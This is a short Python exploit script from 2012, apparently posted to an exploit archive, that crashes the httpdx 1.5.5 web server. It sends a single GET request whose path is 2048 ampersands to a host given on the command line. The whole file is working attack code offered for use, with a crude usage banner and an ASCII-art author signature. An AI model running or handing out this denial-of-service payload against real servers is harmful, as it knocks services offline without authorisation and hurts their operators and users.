|
# Exploit Title: [httpdx 1.5.5 remote D.O.S.]
# Date: [23/07/2012]
# Author: [SnakingMax]
# Website: [http://sourceforge.net/projects/httpdx/]
# Software Link: [http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.5/httpdx1.5.5.zip/download]
# Vendor: jazu100
# Category: [Remote Exploit]
from http.client import HTTPConnection
import sys, urllib.request
if ( (__name__)=="__main__" ):
if len(sys.argv) != 2:
print("Wellcome to httpdx madafakar tool\n")
print("Usage: python3 "+sys.argv[0]+" http://www.VulnerableServer.com\n\n")
print("Downloaded from: http://snakingmax.blogspot.com/")
else:
conn = HTTPConnection(sys.argv[1])
conn.request('GET', '/'+ ('&'*2048) )
# ____ _ _ __ __
# / ___| _ __ __ _| | _(_)_ __ __ _| \/ | __ ___ __
# \___ \| '_ \ / _` | |/ / | '_ \ / _` | |\/| |/ _` \ \/ /
# ___) | | | | (_| | <| | | | | (_| | | | | (_| |> < ____
# ____|____/|_| |_|\__,_|_|\_\_|_| |_|\__, |_| |_|\__,_/_/\_\__/ O \___/
# <\x41\x41\x41\x41\x41\x41\x41\x41\x41|___/\x41\x41\x41\x41\x41______/ \
|